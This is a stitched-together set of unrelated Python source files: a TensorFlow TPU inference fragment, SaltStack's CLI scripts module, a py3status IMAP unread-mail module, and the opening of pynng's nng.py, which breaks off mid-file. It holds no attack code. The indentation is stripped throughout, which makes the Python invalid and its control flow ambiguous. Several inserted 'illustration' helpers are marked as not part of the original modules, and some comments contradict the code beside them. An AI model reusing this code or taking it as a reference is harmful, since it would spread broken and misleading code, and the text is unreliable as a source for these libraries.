export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture(
(estimator_spec, export_outputs_dict, predictions_dict, none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
params):
"""Builds the TPU computation for inference on TPU."""
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
model_fn_args = function_utils.fn_args(model_fn)
kwargs = {}
    # Makes deep copy with `config` and `params` in case user mutates them.
if 'labels' in model_fn_args:
kwargs['labels'] = labels
if 'mode' in model_fn_args:
kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
estimator_spec = model_fn(features, **kwargs)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = tf.nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = tf.nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def inference_on_tpu(computation,
inputs_to_tpu,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes=None,
max_enqueued_batches=10):
"""Convenient wrapper for export_saved_model API v2 to wrap TPU computation.
  It puts the computation on TPU, adds batching around it, and round-robins the
  computation between TPU cores.
See tpu_estimator_test.py for an example.
Args:
computation: computation to be put on TPU, which takes inputs_to_tpu as
arguments.
inputs_to_tpu: a list of tensors as input to computation.
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op to
pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to 10.
Returns:
The unbatched computation output Tensors.
"""
@tf.nondifferentiable_batch_function(num_batch_threads, max_batch_size,
batch_timeout_micros, allowed_batch_sizes,
max_enqueued_batches)
def batched_tpu_computation(*args):
@function.Defun(capture_resource_var_by_value=False)
def tpu_computation():
return tf.compat.v1.tpu.rewrite(computation, args)
return tpu_functional.TPUPartitionedCall(
args=tpu_computation.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
f=tpu_computation)
return batched_tpu_computation(*inputs_to_tpu)
|
scripts.py
|
# -*- coding: utf-8 -*-
"""
This module contains the function calls to execute command line scripts
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import functools
import logging
import os
import signal
import sys
import threading
import time
import traceback
from random import randint
import salt.defaults.exitcodes # pylint: disable=unused-import
import salt.ext.six as six
# Import salt libs
from salt.exceptions import SaltClientError, SaltReqTimeoutError, SaltSystemExit
log = logging.getLogger(__name__)
def _handle_interrupt(exc, original_exc, hardfail=False, trace=""):
"""
if hardfailing:
If we got the original stacktrace, log it
If all cases, raise the original exception
but this is logically part the initial
stack.
else just let salt exit gracefully
"""
if hardfail:
if trace:
log.error(trace)
raise original_exc
else:
raise exc
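# Hedged illustration (not part of the original module): how _handle_interrupt
# chooses which exception to raise. The exception instances below reuse the
# messages from _handle_signals and are only examples.
def _demo_handle_interrupt():
    friendly = SystemExit("\nExiting gracefully on Ctrl-c")
    original = Exception("\nExiting with hard crash on Ctrl-c")
    try:
        _handle_interrupt(friendly, original, hardfail=False)
    except SystemExit:
        pass  # without hard_crash, salt exits gracefully
    try:
        _handle_interrupt(friendly, original, hardfail=True)
    except Exception as exc:  # pylint: disable=broad-except
        assert exc is original  # with hard_crash, the original exception is raised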
def _handle_signals(client, signum, sigframe):
try:
# This raises AttributeError on Python 3.4 and 3.5 if there is no current exception.
# Ref: https://bugs.python.org/issue23003
trace = traceback.format_exc()
except AttributeError:
trace = ""
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
if signum == signal.SIGINT:
exit_msg = "\nExiting gracefully on Ctrl-c"
try:
jid = client.local_client.pub_data["jid"]
exit_msg += (
"\n"
"This job's jid is: {0}\n"
"The minions may not have all finished running and any remaining "
"minions will return upon completion. To look up the return data "
"for this job later, run the following command:\n\n"
"salt-run jobs.lookup_jid {0}".format(jid)
)
except (AttributeError, KeyError):
pass
else:
exit_msg = None
_handle_interrupt(
SystemExit(exit_msg),
Exception("\nExiting with hard crash on Ctrl-c"),
hardcrash,
trace=trace,
)
def _install_signal_handlers(client):
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, functools.partial(_handle_signals, client))
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
        signal.signal(signal.SIGTERM, functools.partial(_handle_signals, client))
def salt_master():
"""
Start the salt master.
"""
import salt.cli.daemons
# Fix for setuptools generated scripts, so that it will
# work with multiprocessing fork emulation.
# (see multiprocessing.forking.get_preparation_data())
if __name__ != "__main__":
sys.modules["__main__"] = sys.modules[__name__]
# REMOVEME after Python 2.7 support is dropped (also the six import)
if six.PY2:
from salt.utils.versions import warn_until
# Message borrowed from pip's deprecation warning
warn_until(
"3001",
"Python 2.7 will reach the end of its life on January 1st,"
" 2020. Please upgrade your Python as Python 2.7 won't be"
" maintained after that date. Salt will drop support for"
" Python 2.7 in the 3001 release or later.",
)
# END REMOVEME
master = salt.cli.daemons.Master()
master.start()
def minion_process():
"""
Start a minion process
"""
import salt.utils.platform
import salt.utils.process
import salt.cli.daemons
# salt_minion spawns this function in a new process
salt.utils.process.appendproctitle("KeepAlive")
def handle_hup(manager, sig, frame):
manager.minion.reload()
lock = threading.RLock()
def suicide_when_without_parent(parent_pid):
"""
Have the minion suicide if the parent process is gone
        NOTE: there is a small race issue where the parent PID could be replaced
        with another process with the same PID!
"""
while lock.acquire(blocking=False):
lock.release()
time.sleep(5)
try:
# check pid alive (Unix only trick!)
if os.getuid() == 0 and not salt.utils.platform.is_windows():
os.kill(parent_pid, 0)
except OSError as exc:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
log.error("Minion process encountered exception: %s", exc)
os._exit(salt.defaults.exitcodes.EX_GENERIC)
try:
if not salt.utils.platform.is_windows():
thread = threading.Thread(
target=suicide_when_without_parent, args=(os.getppid(),)
)
thread.start()
minion = salt.cli.daemons.Minion()
signal.signal(signal.SIGHUP, functools.partial(handle_hup, minion))
minion.start()
except (SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
lock.acquire(blocking=True)
log.warning(
"Fatal functionality error caught by minion handler:\n", exc_info=True
)
log.warning("** Restarting minion **")
delay = 60
if minion is not None and hasattr(minion, "config"):
delay = minion.config.get("random_reauth_delay", 60)
delay = randint(1, delay)
log.info("waiting random_reauth_delay %ss", delay)
time.sleep(delay)
sys.exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
finally:
lock.acquire(blocking=True)
def salt_minion():
"""
Start the salt minion in a subprocess.
Auto restart minion on error.
"""
import signal
import salt.utils.platform
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.daemons
import multiprocessing
# Fix for setuptools generated scripts, so that it will
# work with multiprocessing fork emulation.
# (see multiprocessing.forking.get_preparation_data())
if __name__ != "__main__":
sys.modules["__main__"] = sys.modules[__name__]
if "" in sys.path:
sys.path.remove("")
if salt.utils.platform.is_windows():
minion = salt.cli.daemons.Minion()
minion.start()
return
# REMOVEME after Python 2.7 support is dropped (also the six import)
elif six.PY2:
from salt.utils.versions import warn_until
# Message borrowed from pip's deprecation warning
warn_until(
"3001",
"Python 2.7 will reach the end of its life on January 1st,"
" 2020. Please upgrade your Python as Python 2.7 won't be"
" maintained after that date. Salt will drop support for"
" Python 2.7 in the 3001 release or later.",
)
# END REMOVEME
if "--disable-keepalive" in sys.argv:
sys.argv.remove("--disable-keepalive")
minion = salt.cli.daemons.Minion()
minion.start()
return
def escalate_signal_to_process(
pid, signum, sigframe
): # pylint: disable=unused-argument
"""
Escalate the signal received to the multiprocessing process that
is actually running the minion
"""
# escalate signal
os.kill(pid, signum)
# keep one minion subprocess running
prev_sigint_handler = signal.getsignal(signal.SIGINT)
prev_sigterm_handler = signal.getsignal(signal.SIGTERM)
while True:
try:
process = multiprocessing.Process(target=minion_process)
process.start()
signal.signal(
signal.SIGTERM,
functools.partial(escalate_signal_to_process, process.pid),
)
signal.signal(
signal.SIGINT,
functools.partial(escalate_signal_to_process, process.pid),
)
signal.signal(
signal.SIGHUP,
functools.partial(escalate_signal_to_process, process.pid),
)
except Exception: # pylint: disable=broad-except
# if multiprocessing does not work
minion = salt.cli.daemons.Minion()
minion.start()
break
process.join()
        # Process exited or was terminated. Since we're going to try to restart
        # it, we MUST reset signal handling to the previous handlers.
signal.signal(signal.SIGINT, prev_sigint_handler)
signal.signal(signal.SIGTERM, prev_sigterm_handler)
if not process.exitcode == salt.defaults.exitcodes.SALT_KEEPALIVE:
sys.exit(process.exitcode)
        # On top of the random_reauth_delay already performed, delay extra to
        # reduce flooding and free resources.
        # NOTE: values are static but should be fine.
time.sleep(2 + randint(1, 10))
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
        for handler in rlogger.handlers[:]:
rlogger.removeHandler(handler)
logging.basicConfig()
def proxy_minion_process(queue):
"""
Start a proxy minion process
"""
import salt.cli.daemons
import salt.utils.platform
# salt_minion spawns this function in a new process
lock = threading.RLock()
def suicide_when_without_parent(parent_pid):
"""
Have the minion suicide if the parent process is gone
        NOTE: there is a small race issue where the parent PID could be replaced
        with another process with the same PID!
"""
while lock.acquire(blocking=False):
lock.release()
time.sleep(5)
try:
# check pid alive (Unix only trick!)
os.kill(parent_pid, 0)
except OSError:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
os._exit(999)
try:
if not salt.utils.platform.is_windows():
thread = threading.Thread(
target=suicide_when_without_parent, args=(os.getppid(),)
)
thread.start()
restart = False
proxyminion = None
status = salt.defaults.exitcodes.EX_OK
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
# pylint: disable=broad-except
except (Exception, SaltClientError, SaltReqTimeoutError, SaltSystemExit,) as exc:
# pylint: enable=broad-except
log.error("Proxy Minion failed to start: ", exc_info=True)
restart = True
# status is superfluous since the process will be restarted
status = salt.defaults.exitcodes.SALT_KEEPALIVE
except SystemExit as exc:
restart = False
status = exc.code
finally:
lock.acquire(blocking=True)
if restart is True:
log.warning("** Restarting proxy minion **")
delay = 60
if proxyminion is not None:
if hasattr(proxyminion, "config"):
delay = proxyminion.config.get("random_reauth_delay", 60)
random_delay = randint(1, delay)
log.info("Sleeping random_reauth_delay of %s seconds", random_delay)
            # perform delay after minion resources have been cleaned
queue.put(random_delay)
else:
queue.put(0)
sys.exit(status)
def salt_proxy():
"""
Start a proxy minion.
"""
import salt.cli.daemons
import salt.utils.platform
import multiprocessing
if "" in sys.path:
sys.path.remove("")
if salt.utils.platform.is_windows():
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
if "--disable-keepalive" in sys.argv:
sys.argv.remove("--disable-keepalive")
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
# keep one minion subprocess running
while True:
try:
queue = multiprocessing.Queue()
except Exception: # pylint: disable=broad-except
# This breaks in containers
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
process = multiprocessing.Process(target=proxy_minion_process, args=(queue,))
process.start()
try:
process.join()
try:
restart_delay = queue.get(block=False)
except Exception: # pylint: disable=broad-except
if process.exitcode == 0:
# Minion process ended naturally, Ctrl+C or --version
break
restart_delay = 60
if restart_delay == 0:
# Minion process ended naturally, Ctrl+C, --version, etc.
sys.exit(process.exitcode)
# delay restart to reduce flooding and allow network resources to close
time.sleep(restart_delay)
except KeyboardInterrupt:
break
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
        for handler in rlogger.handlers[:]:
rlogger.removeHandler(handler)
logging.basicConfig()
def salt_syndic():
"""
Start the salt syndic.
"""
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.daemons
pid = os.getpid()
try:
syndic = salt.cli.daemons.Syndic()
syndic.start()
except KeyboardInterrupt:
os.kill(pid, 15)
def salt_key():
"""
Manage the authentication keys with salt-key.
"""
import salt.cli.key
try:
client = salt.cli.key.SaltKey()
_install_signal_handlers(client)
client.run()
except Exception as err: # pylint: disable=broad-except
sys.stderr.write("Error: {0}\n".format(err))
def salt_cp():
"""
Publish commands to the salt system from the command line on the
master.
"""
import salt.cli.cp
client = salt.cli.cp.SaltCPCli()
_install_signal_handlers(client)
client.run()
def salt_call():
"""
Directly call a salt command in the modules, does not require a running
salt minion to run.
"""
import salt.cli.call
if "" in sys.path:
sys.path.remove("")
client = salt.cli.call.SaltCall()
_install_signal_handlers(client)
client.run()
def salt_run():
"""
Execute a salt convenience routine.
"""
import salt.cli.run
if "" in sys.path:
sys.path.remove("")
client = salt.cli.run.SaltRun()
_install_signal_handlers(client)
client.run()
def salt_ssh():
"""
Execute the salt-ssh system
"""
import salt.cli.ssh
if "" in sys.path:
sys.path.remove("")
try:
client = salt.cli.ssh.SaltSSH()
_install_signal_handlers(client)
client.run()
except SaltClientError as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(SystemExit(err), err, hardcrash, trace=trace)
def salt_cloud():
"""
The main function for salt-cloud
"""
# Define 'salt' global so we may use it after ImportError. Otherwise,
# UnboundLocalError will be raised.
global salt # pylint: disable=W0602
try:
# Late-imports for CLI performance
import salt.cloud
import salt.cloud.cli
except ImportError as e:
# No salt cloud on Windows
log.error("Error importing salt cloud: %s", e)
print("salt-cloud is not available in this system")
sys.exit(salt.defaults.exitcodes.EX_UNAVAILABLE)
if "" in sys.path:
sys.path.remove("")
client = salt.cloud.cli.SaltCloud()
_install_signal_handlers(client)
client.run()
def salt_api():
"""
The main function for salt-api
"""
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.api
sapi = salt.cli.api.SaltAPI() # pylint: disable=E1120
sapi.start()
def salt_main():
"""
Publish commands to the salt system from the command line on the
master.
"""
import salt.cli.salt
if "" in sys.path:
sys.path.remove("")
client = salt.cli.salt.SaltCMD()
_install_signal_handlers(client)
client.run()
def salt_spm():
"""
The main function for spm, the Salt Package Manager
.. versionadded:: 2015.8.0
"""
import salt.cli.spm
spm = salt.cli.spm.SPM() # pylint: disable=E1120
spm.run()
def salt_extend(extension, name, description, salt_dir, merge):
"""
Quickstart for developing on the saltstack installation
.. versionadded:: 2016.11.0
"""
import salt.utils.extend
salt.utils.extend.run(
extension=extension,
name=name,
description=description,
salt_dir=salt_dir,
merge=merge,
)
def salt_unity():
"""
Change the args and redirect to another salt script
"""
avail = []
for fun in dir(sys.modules[__name__]):
if fun.startswith("salt"):
avail.append(fun[5:])
if len(sys.argv) < 2:
msg = "Must pass in a salt command, available commands are:"
for cmd in avail:
msg += "\n{0}".format(cmd)
print(msg)
sys.exit(1)
cmd = sys.argv[1]
if cmd not in avail:
# Fall back to the salt command
sys.argv[0] = "salt"
s_fun = salt_main
else:
sys.argv[0] = "salt-{0}".format(cmd)
sys.argv.pop(1)
s_fun = getattr(sys.modules[__name__], "salt_{0}".format(cmd))
s_fun()
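# Hedged illustration (not part of the original module): the argv rewriting that
# salt_unity performs before dispatching, shown on a copied list instead of the
# real sys.argv. The command and arguments are arbitrary examples.
def _demo_unity_dispatch_rewrite():
    argv = ["salt-unity", "call", "test.ping"]
    cmd = argv[1]
    argv[0] = "salt-{0}".format(cmd)
    argv.pop(1)
    assert argv == ["salt-call", "test.ping"]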
|
imap.py
|
"""
Display number of unread messages from IMAP account.
Configuration parameters:
allow_urgent: display urgency on unread messages (default False)
auth_scope: scope to use with OAuth2 (default 'https://mail.google.com/')
auth_token: path to where the pickled access/refresh token will be saved
after successful credential authorization.
(default '~/.config/py3status/imap_auth_token.pickle')
cache_timeout: refresh interval for this module (default 60)
client_secret: the path to the client secret file with OAuth 2.0
credentials (if None then OAuth not used) (default None)
criterion: status of emails to check for (default 'UNSEEN')
debug: log warnings (default False)
degraded_when_stale: color as degraded when updating failed (default True)
format: display format for this module (default 'Mail: {unseen}')
hide_if_zero: hide this module when no new mail (default False)
mailbox: name of the mailbox to check (default 'INBOX')
password: login password (default None)
port: number to use (default '993')
read_timeout: timeout for read(2) syscalls (default 5)
    security: login authentication method: 'ssl' or 'starttls'
        (starttls needs Python 3.2 or later) (default 'ssl')
server: server to connect (default None)
use_idle: use IMAP4 IDLE instead of polling; requires compatible
server; uses cache_timeout for IDLE's timeout; will auto detect
when set to None (default None)
user: login user (default None)
Format placeholders:
{unseen} number of unread emails
Color options:
color_new_mail: use color when new mail arrives, default to color_good
OAuth:
OAuth2 will be used for authentication instead of a password if the
client_secret path is set.
To create a client_secret for your Google account, visit
https://console.developers.google.com/ and create an "OAuth client ID" from
the credentials tab.
This client secret enables the app (in this case, the IMAP py3status module)
to request access to a user's email. Therefore the client secret doesn't
have to be for the same Google account as the email account being accessed.
When the IMAP module first tries to access your email account a browser
window will open asking for authorization to access your email.
After authorization is complete, an access/refresh token will be saved to
the path configured in auth_token.
Requires: Using OAuth requires the google-auth and google-auth-oauthlib
libraries to be installed.
Note: the same client secret file can be used as with the py3status Google
Calendar module.
@author obb, girst
SAMPLE OUTPUT
{'full_text': 'Mail: 36', 'color': '#00FF00'}
"""
import imaplib
from threading import Thread
from time import sleep
from ssl import create_default_context
from socket import setdefaulttimeout, error as socket_error
from pathlib import Path
STRING_UNAVAILABLE = "N/A"
NO_DATA_YET = -1
class Py3status:
""""""
# available configuration parameters
allow_urgent = False
auth_scope = "https://mail.google.com/"
auth_token = "~/.config/py3status/imap_auth_token.pickle"
cache_timeout = 60
client_secret = None
criterion = "UNSEEN"
debug = False
degraded_when_stale = True
format = "Mail: {unseen}"
hide_if_zero = False
mailbox = "INBOX"
password = None
port = "993"
read_timeout = 5
security = "ssl"
server = None
use_idle = None
user = None
class Meta:
deprecated = {
"rename": [
{
"param": "new_mail_color",
"new": "color_new_mail",
"msg": "obsolete parameter use `color_new_mail`",
},
{
"param": "imap_server",
"new": "server",
"msg": "obsolete parameter use `server`",
},
]
}
def post_config_hook(self):
# class variables:
self.mail_count = NO_DATA_YET
self.connection = None
self.mail_error = None # cannot throw self.py3.error from thread
self.network_error = None
        # IMAP commands are tagged, so responses can be matched up to requests
        self.command_tag = 0
self.idle_thread = Thread()
if self.client_secret:
self.client_secret = Path(self.client_secret).expanduser()
self.auth_token = Path(self.auth_token).expanduser()
if self.security not in ["ssl", "starttls"]:
raise ValueError("Unknown security protocol")
def imap(self):
# I -- acquire mail_count
if self.use_idle is not False:
if not self.idle_thread.is_alive():
sleep(
self.read_timeout
) # rate-limit thread-restarting (when network is offline)
self.idle_thread = Thread(target=self._get_mail_count)
self.idle_thread.daemon = True
self.idle_thread.start()
else:
self._get_mail_count()
response = {"cached_until": self.py3.time_in(self.cache_timeout)}
if self.mail_error is not None:
self.py3.log(self.mail_error, level=self.py3.LOG_ERROR)
self.py3.error(self.mail_error)
self.mail_error = None
# II -- format response
response["full_text"] = self.py3.safe_format(
self.format, {"unseen": self.mail_count}
)
if self.mail_count is None:
response["color"] = (self.py3.COLOR_BAD,)
response["full_text"] = self.py3.safe_format(
self.format, {"unseen": STRING_UNAVAILABLE}
)
elif self.mail_count == NO_DATA_YET:
response["full_text"] = ""
elif self.mail_count == 0 and self.hide_if_zero:
response["full_text"] = ""
elif self.mail_count > 0:
response["color"] = self.py3.COLOR_NEW_MAIL or self.py3.COLOR_GOOD
response["urgent"] = self.allow_urgent
if self.network_error is not None and self.degraded_when_stale:
response["color"] = self.py3.COLOR_DEGRADED
return response
def _check_if_idle(self, connection):
supports_idle = "IDLE" in connection.capabilities
self.use_idle = supports_idle
self.py3.log("Will use {}".format("idling" if self.use_idle else "polling"))
if self.use_idle and not supports_idle:
self.py3.error("Server does not support IDLE")
def _get_creds(self):
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from google.auth.exceptions import TransportError
import pickle
self.creds = None
# Open pickle file with access and refresh tokens if it exists
if self.auth_token.exists():
with self.auth_token.open("rb") as token:
self.creds = pickle.load(token)
if not self.creds or not self.creds.valid:
try:
if self.creds and self.creds.expired and self.creds.refresh_token:
# Credentials expired but contain refresh token
self.creds.refresh(Request())
else:
# No valid credentials so open authorisation URL in browser
flow = InstalledAppFlow.from_client_secrets_file(
self.client_secret, [self.auth_scope]
)
self.creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with self.auth_token.open("wb") as token:
pickle.dump(self.creds, token)
except TransportError as e:
# Treat the same as a socket_error
raise socket_error(e)
def _connection_ssl(self):
if self.client_secret:
# Use OAUTH
self._get_creds()
setdefaulttimeout(self.read_timeout)
connection = imaplib.IMAP4_SSL(self.server, int(self.port))
return connection
def _connection_starttls(self):
setdefaulttimeout(self.read_timeout)
connection = imaplib.IMAP4(self.server, int(self.port))
connection.starttls(create_default_context())
return connection
def _connect(self):
if self.security == "ssl":
self.connection = self._connection_ssl()
elif self.security == "starttls":
self.connection = self._connection_starttls()
if self.use_idle is None:
self._check_if_idle(self.connection)
# trigger a socket.timeout if any IMAP request isn't completed in time:
self.connection.socket().settimeout(self.read_timeout)
def _disconnect(self):
try:
if self.connection is not None:
if self.connection.state == "SELECTED":
self.connection.close()
self.connection.logout()
except: # noqa e722
pass
finally:
self.connection = None
def _idle(self):
"""
since imaplib doesn't support IMAP4r1 IDLE, we'll do it by hand
"""
socket = None
try:
# build a new command tag (Xnnn) as bytes:
self.command_tag = (self.command_tag + 1) % 1000
command_tag = b"X" + bytes(str(self.command_tag).zfill(3), "ascii")
# make sure we have selected anything before idling:
directories = self.mailbox.split(",")
self.connection.select(directories[0])
socket = self.connection.socket()
# send IDLE command and check response:
socket.write(command_tag + b" IDLE\r\n")
try:
response = socket.read(4096).decode("ascii")
except socket_error:
raise imaplib.IMAP4.abort("Server didn't respond to 'IDLE' in time")
            # Dovecot will respond with "+ idling", courier will return "+ entering idle mode".
# RFC 2177 (https://tools.ietf.org/html/rfc2177) only requires the "+" character.
if not response.lower().startswith("+"):
raise imaplib.IMAP4.abort(f"While initializing IDLE: {response}")
# wait for changes (EXISTS, EXPUNGE, etc.):
socket.settimeout(self.cache_timeout)
while True:
try:
response = socket.read(4096).decode("ascii")
if response.upper().startswith("* OK"):
continue # ignore '* OK Still here'
else:
break
except socket_error: # IDLE timed out
break
finally: # terminate IDLE command gracefully
if socket is None:
return
socket.settimeout(self.read_timeout)
socket.write(b"DONE\r\n") # important! Can't query IMAP again otherwise
try:
response = socket.read(4096).decode("ascii")
except socket_error:
raise imaplib.IMAP4.abort("Server didn't respond to 'DONE' in time")
# sometimes, more messages come in between reading and DONEing; so read them again:
if response.startswith("* "):
try:
response = socket.read(4096).decode("ascii")
except socket_error:
raise imaplib.IMAP4.abort(
"Server sent more continuations, but no 'DONE' ack"
)
expected_response = (command_tag + b" OK").decode("ascii")
if not response.lower().startswith(expected_response.lower()):
raise imaplib.IMAP4.abort("While terminating IDLE: " + response)
def _get_mail_count(self):
retry_counter = 0
retry_max = 3
while True:
try:
if self.connection is None:
self._connect()
if self.connection.state == "NONAUTH":
if self.client_secret:
# Authenticate using OAUTH
auth_string = "user={}\1auth=Bearer {}\1\1".format(
self.user, self.creds.token
)
self.connection.authenticate("XOAUTH2", lambda x: auth_string)
else:
# Login with user and password
self.connection.login(self.user, self.password)
tmp_mail_count = 0
directories = self.mailbox.split(",")
for directory in directories:
self.connection.select(directory)
unseen_response = self.connection.search(None, self.criterion)
mails = unseen_response[1][0].split()
tmp_mail_count += len(mails)
self.mail_count = tmp_mail_count
self.network_error = None
if self.use_idle:
self.py3.update()
self._idle()
retry_counter = 0
else:
return
except (socket_error, imaplib.IMAP4.abort, imaplib.IMAP4.readonly) as e:
if "didn't respond to 'DONE'" in str(e) or isinstance(e, socket_error):
self.network_error = str(e)
error_type = "Network"
else:
error_type = "Recoverable"
# Note: we don't reset network_error, as we want this to persist
# until we either run into a permanent error or successfully receive
# another response from the IMAP server.
if self.debug:
self.py3.log(
f"{error_type} error - {e}", level=self.py3.LOG_WARNING,
)
self._disconnect()
retry_counter += 1
if retry_counter <= retry_max:
if self.debug:
self.py3.log(
f"Retrying ({retry_counter}/{retry_max})",
level=self.py3.LOG_INFO,
)
continue
break
except (imaplib.IMAP4.error, Exception) as e:
self.mail_error = f"Fatal error - {e}"
self._disconnect()
self.mail_count = None
retry_counter += 1
if retry_counter <= retry_max:
if self.debug:
self.py3.log(
"Will retry after 60 seconds ({}/{})".format(
retry_counter, retry_max
),
level=self.py3.LOG_INFO,
)
sleep(60)
continue
break
finally:
self.py3.update() # to propagate mail_error
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status)
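# Hedged example (not part of the module): the handful of parameters a typical
# user configuration would override for this module; the values below are
# placeholders, not real credentials or defaults taken from the code above.
def _example_imap_config():
    return {
        "server": "imap.example.com",
        "user": "me@example.com",
        "password": "hunter2",
        "mailbox": "INBOX,Lists",      # multiple mailboxes are comma-separated
        "format": "Mail: {unseen}",
    }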
|
nng.py
|
"""
Provides a Pythonic interface to cffi nng bindings
"""
import logging
import threading
import atexit
import pynng
from ._nng import ffi, lib
from .exceptions import check_err
from . import options
from . import _aio
logger = logging.getLogger(__name__)
__all__ = '''
ffi
Bus0
Pair0
Pair1
Pull0 Push0
Pub0 Sub0
Req0 Rep0
Socket
Surveyor0 Respondent0
'''.split()
# Register an atexit handler to call the nng_fini() cleanup function.
# This is necessary to ensure:
# * The Python interpreter doesn't finalize and kill the reap thread
# during a callback to _nng_pipe_cb
# * Cleanup background queue threads used by NNG
def _pynng_atexit():
lib.nng_fini()
atexit.register(_pynng_atexit)
def _ensure_can_send(thing):
"""
It's easy to accidentally pass in a str instead of bytes when send()ing.
This gives a more informative message if a ``str`` was accidentally passed
to a send method.
"""
# at some point it might be nice to check for the specific types we **can**
# send...
if isinstance(thing, str):
raise ValueError('Cannot send type str. '
'Maybe you left out a ".encode()" somewhere?')
def to_char(charlike):
"""Convert str or bytes to char*."""
# fast path for stuff that doesn't need to be changed.
if isinstance(charlike, ffi.CData):
return charlike
if isinstance(charlike, str):
charlike = charlike.encode()
charlike = ffi.new('char[]', charlike)
return charlike
class _NNGOption:
"""A descriptor for more easily getting/setting NNG option."""
# this class should not be instantiated directly! Instantiation will work,
# but getting/setting will fail.
# subclasses set _getter and _setter to the module-level getter and setter
# functions
_getter = None
_setter = None
def __init__(self, option_name):
self.option = to_char(option_name)
def __get__(self, instance, owner):
# have to look up the getter on the class
if self._getter is None:
raise TypeError("{} cannot be set".format(self.__class__))
return self.__class__._getter(instance, self.option)
def __set__(self, instance, value):
if self._setter is None:
raise TypeError("{} is readonly".format(self.__class__))
self.__class__._setter(instance, self.option, value)
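# Hedged, pure-Python sketch (not part of the library): the descriptor pattern
# used by _NNGOption, where subclasses supply the getter/setter and the base
# class dispatches to them. The classes and names below are invented for the
# sketch only.
def _demo_option_descriptor_pattern():
    class _DemoOption:
        _getter = None

        def __init__(self, name):
            self.name = name

        def __get__(self, instance, owner):
            return self.__class__._getter(instance, self.name)

    class _UpperOption(_DemoOption):
        _getter = staticmethod(lambda instance, name: name.upper())

    class _Holder:
        shouty = _UpperOption('recv-timeout')

    assert _Holder().shouty == 'RECV-TIMEOUT'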
class IntOption(_NNGOption):
"""Descriptor for getting/setting integer options"""
_getter = options._getopt_int
_setter = options._setopt_int
class MsOption(_NNGOption):
"""Descriptor for getting/setting durations (in milliseconds)"""
_getter = options._getopt_ms
_setter = options._setopt_ms
class SockAddrOption(_NNGOption):
"""Descriptor for getting/setting durations (in milliseconds)"""
_getter = options._getopt_sockaddr
class SizeOption(_NNGOption):
"""Descriptor for getting/setting size_t options"""
_getter = options._getopt_size
_setter = options._setopt_size
class StringOption(_NNGOption):
"""Descriptor for getting/setting string options"""
_getter = options._getopt_string
_setter = options._setopt_string
class BooleanOption(_NNGOption):
"""Descriptor for getting/setting boolean values"""
_getter = options._getopt_bool
_setter = options._setopt_bool
class PointerOption(_NNGOption):
"""Descriptor for setting pointer values"""
_setter = options._setopt_ptr
class NotImplementedOption(_NNGOption):
"""Represents a currently un-implemented option in Python."""
